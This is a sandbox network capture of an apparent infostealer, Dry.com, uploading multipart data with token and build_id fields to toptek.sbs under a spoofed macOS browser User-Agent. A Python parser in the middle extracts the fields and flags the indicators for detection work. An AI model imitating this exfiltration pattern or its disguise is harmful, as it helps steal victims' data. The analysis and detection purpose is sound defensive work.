2024-12-23 05:21:53 UTC | 16355 | OUT | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-23 05:21:53 UTC | 581 | OUT | Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-23 05:21:54 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 23 Dec 2024 05:21:54 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-12-23 05:21:54 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 2ok0


Session ID: 18   Source IP: 192.168.2.4   Source Port: 49775   Destination IP: 94.130.188.57   Destination Port: 443   PID: 7548   Process: C:\Users\user\AppData\Local\Temp\245347\Dry.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:21:56 UTC   325 bytes OUT
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----E3E3OPZUA1N7YU3OPH4W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 153381
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:21:56 UTC   16355 bytes OUT   (the report prints the first 255 bytes of this chunk)
Data Raw:   2d 2d 2d 2d 2d 2d 45 33 45 33 4f 50 5a 55 41 31 4e 37 59 55 33 4f 50 48 34 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 45 33 45 33 4f 50 5a 55 41 31 4e 37 59 55 33 4f 50 48 34 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 45 33 45 33 4f 50 5a 55 41 31 4e 37 59 55 33 4f 50 48 34 57 0d 0a 43 6f 6e 74
Data Ascii (CR/LF restored from the hex):
------E3E3OPZUA1N7YU3OPH4W
Content-Disposition: form-data; name="token"

a66c99b4ea1107d67781e132b296cd32
------E3E3OPZUA1N7YU3OPH4W
Content-Disposition: form-data; name="build_id"

dadb5e51ebe3ba12afb7fbe624d12a2b
------E3E3OPZUA1N7YU3OPH4W
Cont
2024-12-23 05:21:56 UTC   16355 bytes OUT   Data Raw: 41 41 41 41 41 41 41 41 ...   Data Ascii: AAAAAAAA... (every byte shown is 0x41 'A')
2024-12-23 05:21:56 UTC   16355 bytes OUT   Data Raw: 41 41 41 41 41 41 41 41 ...   Data Ascii: AAAAAAAA... (every byte shown is 0x41 'A')
2024-12-23 05:21:56 UTC   16355 bytes OUT   Data Raw: 41 41 41 41 41 41 41 41 ...   Data Ascii: AAAAAAAA... (every byte shown is 0x41 'A')
2024-12-23 05:21:56 UTC   16355 bytes OUT   Data Raw: 41 41 41 41 41 41 41 41 ...   Data Ascii: AAAAAAAA... (every byte shown is 0x41 'A')
2024-12-23 05:21:56 UTC   16355 bytes OUT   Data Raw: 41 41 41 41 41 41 41 41 ...   Data Ascii: AAAAAAAA... (every byte shown is 0x41 'A')
2024-12-23 05:21:56 UTC   16355 bytes OUT   Data Raw: 41 41 41 41 41 41 41 41 ...   Data Ascii: AAAAAAAA... (every byte shown is 0x41 'A')
2024-12-23 05:21:56 UTC   16355 bytes OUT   Data Raw: 41 41 41 41 41 41 41 41 ...   Data Ascii: AAAAAAAA... (every byte shown is 0x41 'A')
2024-12-23 05:21:56 UTC   16355 bytes OUT   Data Raw: 41 41 41 41 41 41 41 41 ...   Data Ascii: AAAAAAAA... (every byte shown is 0x41 'A')
2024-12-23 05:21:56 UTC   6186 bytes OUT    Data Raw: 41 41 41 41 41 41 41 41 ...   Data Ascii: AAAAAAAA... (every byte shown is 0x41 'A')
2024-12-23 05:21:57 UTC   158 bytes IN
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:21:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
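Added example (not Joe Sandbox output and not code from the sample): a parser that takes the first "Data Raw" chunk of session 18 exactly as the report prints it, recovers the multipart form fields, and flags the indicators a detection engineer would key on from this capture. The request headers and the sending process path are copied from the session above; the 'A' filler sample in the test is constructed. Observations the checks encode: the User-Agent claims macOS/Opera while the sender is a Windows binary running from %LOCALAPPDATA%\Temp; the body opens with two 32-hex-character fields named token and build_id; every displayed byte after those fields is 0x41; and a 153 KB upload goes to a bare domain. Because the session runs to port 443, the plaintext here is presumably what the sandbox recovered from TLS; a sensor without TLS inspection would see only the destination and the size and timing of the uploads.

```python
"""Parse the multipart POST captured in session 18 and flag stealer indicators."""
import re

# Headers copied from the captured request to toptek.sbs (session 18 above).
CAPTURED_HEADERS = {
    "Content-Type": "multipart/form-data; boundary=----E3E3OPZUA1N7YU3OPH4W",
    "User-Agent": ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 "
                   "(KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0"),
    "Host": "toptek.sbs",
    "Content-Length": "153381",
}
# Sending process, from the session table.
CAPTURED_PROCESS = r"C:\Users\user\AppData\Local\Temp\245347\Dry.com"

# First "Data Raw" chunk of the body as the report prints it (255 bytes; the
# report cuts the display there, so the third part ends after "Cont").
CAPTURED_BODY_HEX = """
2d 2d 2d 2d 2d 2d 45 33 45 33 4f 50 5a 55 41 31 4e 37 59 55 33 4f 50 48 34 57 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20
6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a
61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a
2d 2d 2d 2d 2d 2d 45 33 45 33 4f 50 5a 55 41 31 4e 37 59 55 33 4f 50 48 34 57 0d 0a
43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20
6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a
64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a
2d 2d 2d 2d 2d 2d 45 33 45 33 4f 50 5a 55 41 31 4e 37 59 55 33 4f 50 48 34 57 0d 0a
43 6f 6e 74
"""


def hexdump_to_bytes(dump: str) -> bytes:
    """Turn a Joe Sandbox 'Data Raw' hex listing into bytes (whitespace is ignored)."""
    return bytes.fromhex(dump)


def boundary_of(content_type: str) -> str:
    """Extract the boundary parameter from a multipart Content-Type header."""
    m = re.search(r"boundary=([^;]+)", content_type)
    if not m:
        raise ValueError("no multipart boundary in Content-Type")
    return m.group(1).strip().strip('"')


def parse_multipart(body: bytes, boundary: str):
    """Return ({field name: raw value}, truncated) for a multipart/form-data body.

    A part with no blank line after its headers is reported as truncated instead
    of raising, because sandbox dumps cut chunks mid-part (as this one does).
    """
    delim = b"--" + boundary.encode("ascii")
    fields, truncated = {}, False
    for part in body.split(delim)[1:]:
        if part.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:
            truncated = True
            continue
        m = re.search(rb'name="([^"]*)"', head)
        if m:
            # Drop only the single CRLF that precedes the next delimiter.
            if value.endswith(b"\r\n"):
                value = value[:-2]
            fields[m.group(1).decode("ascii", "replace")] = value
    return fields, truncated


def filler_ratio(data: bytes, filler: int = 0x41) -> float:
    """Fraction of bytes equal to the filler byte; 1.0 for the all-'A' chunks above."""
    return data.count(filler) / len(data) if data else 0.0


def stealer_indicators(headers: dict, process: str, fields: dict) -> list:
    """Heuristics derived from this capture; each hit is a human-readable string."""
    hits = []
    ua = headers.get("User-Agent", "")
    if "Macintosh" in ua and process.lower().endswith((".exe", ".com", ".scr", ".dll")):
        hits.append("user-agent claims macOS but the sender is a Windows binary: " + process)
    if "\\appdata\\local\\temp\\" in process.lower():
        hits.append("sender runs from %LOCALAPPDATA%\\Temp")
    if {"token", "build_id"} <= fields.keys():
        hits.append("multipart fields token and build_id open the body (layout of this capture)")
    for name, val in fields.items():
        if re.fullmatch(rb"[0-9a-f]{32}", val):
            hits.append(f"field {name} is a 32-hex-char identifier")
    try:
        if int(headers.get("Content-Length", "0")) > 100_000:
            hits.append("upload body over 100 KB to " + headers.get("Host", "?"))
    except ValueError:
        pass
    return hits


def analyze_session18():
    """Run the parser and the heuristics over the captured request."""
    body = hexdump_to_bytes(CAPTURED_BODY_HEX)
    fields, truncated = parse_multipart(body, boundary_of(CAPTURED_HEADERS["Content-Type"]))
    return fields, truncated, stealer_indicators(CAPTURED_HEADERS, CAPTURED_PROCESS, fields)


if __name__ == "__main__":
    fields, truncated, hits = analyze_session18()
    for name, val in fields.items():
        print(f"{name} = {val.decode('ascii', 'replace')}")
    print("chunk cut mid-part:", truncated)
    for h in hits:
        print("-", h)
```

The same parser applies unchanged to session 19, whose first chunk carries the same token and build_id values behind a different boundary; only the boundary string from its Content-Type header changes. The heuristics are scoped to what this capture shows and are meant as a starting point for a detection rule, not as a general Vidar signature.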


Session ID: 19   Source IP: 192.168.2.4   Source Port: 49776   Destination IP: 94.130.188.57   Destination Port: 443   PID: 7548   Process: C:\Users\user\AppData\Local\Temp\245347\Dry.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:21:57 UTC   325 bytes OUT
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JWTR1VSJEKF37YUA168G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 393697
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:21:57 UTC   16355 bytes OUT   (the report prints the first 255 bytes of this chunk)
Data Raw:   2d 2d 2d 2d 2d 2d 4a 57 54 52 31 56 53 4a 45 4b 46 33 37 59 55 41 31 36 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 57 54 52 31 56 53 4a 45 4b 46 33 37 59 55 41 31 36 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 57 54 52 31 56 53 4a 45 4b 46 33 37 59 55 41 31 36 38 47 0d 0a 43 6f 6e 74
Data Ascii (CR/LF restored from the hex):
------JWTR1VSJEKF37YUA168G
Content-Disposition: form-data; name="token"

a66c99b4ea1107d67781e132b296cd32
------JWTR1VSJEKF37YUA168G
Content-Disposition: form-data; name="build_id"

dadb5e51ebe3ba12afb7fbe624d12a2b
------JWTR1VSJEKF37YUA168G
Cont
2024-12-23 05:21:57 UTC   16355 bytes OUT   Data Raw: 41 41 41 41 41 41 41 41 ...   Data Ascii: AAAAAAAA... (every byte shown is 0x41 'A')
2024-12-23 05:21:57 UTC   16355 bytes OUT   Data Raw: 41 41 41 41 41 41 41 41 ...   Data Ascii: AAAAAAAA... (every byte shown is 0x41 'A')
2024-12-23 05:21:57 UTC   16355 bytes OUT   Data Raw: 41 41 41 41 41 41 41 41 ...   Data Ascii: AAAAAAAA... (every byte shown is 0x41 'A')
2024-12-23 05:21:57 UTC   16355 bytes OUT   Data Raw: 41 41 41 41 41 41 41 41 ...   Data Ascii: AAAAAAAA... (every byte shown is 0x41 'A')
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:57 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:57 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:57 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:57 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:57 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-23 05:21:59 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:21:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49778 | 94.130.188.57 | 443 | 7548 | C:\Users\user\AppData\Local\Temp\245347\Dry.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:22:00 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----Z5XL6XTRI58QIEKFKFCT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 131557
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:22:00 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 5a 35 58 4c 36 58 54 52 49 35 38 51 49 45 4b 46 4b 46 43 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 58 4c 36 58 54 52 49 35 38 51 49 45 4b 46 4b 46 43 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 58 4c 36 58 54 52 49 35 38 51 49 45 4b 46 4b 46 43 54 0d 0a 43 6f 6e 74
Data Ascii (CRLF line breaks restored from the raw bytes):
------Z5XL6XTRI58QIEKFKFCT
Content-Disposition: form-data; name="token"

a66c99b4ea1107d67781e132b296cd32
------Z5XL6XTRI58QIEKFKFCT
Content-Disposition: form-data; name="build_id"

dadb5e51ebe3ba12afb7fbe624d12a2b
------Z5XL6XTRI58QIEKFKFCT
Cont
2024-12-23 05:22:01 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:22:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:22:01 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49779 | 94.130.188.57 | 443 | 7548 | C:\Users\user\AppData\Local\Temp\245347\Dry.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:22:01 UTC | 326 | OUT | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----WL6PZMY5PH4EUAAI58YM
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
    Host: toptek.sbs
    Content-Length: 6990993
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-23 05:22:01 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 57 4c 36 50 5a 4d 59 35 50 48 34 45 55 41 41 49 35 38 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 36 50 5a 4d 59 35 50 48 34 45 55 41 41 49 35 38 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 57 4c 36 50 5a 4d 59 35 50 48 34 45 55 41 41 49 35 38 59 4d 0d 0a 43 6f 6e 74
    Data Ascii: ------WL6PZMY5PH4EUAAI58YMContent-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------WL6PZMY5PH4EUAAI58YMContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------WL6PZMY5PH4EUAAI58YMCont
2024-12-23 05:22:08 UTC | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 23 Dec 2024 05:22:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49785 | 94.130.188.57 | 443 | 7548 | C:\Users\user\AppData\Local\Temp\245347\Dry.com
Timestamp | Bytes transferred | Direction | Data
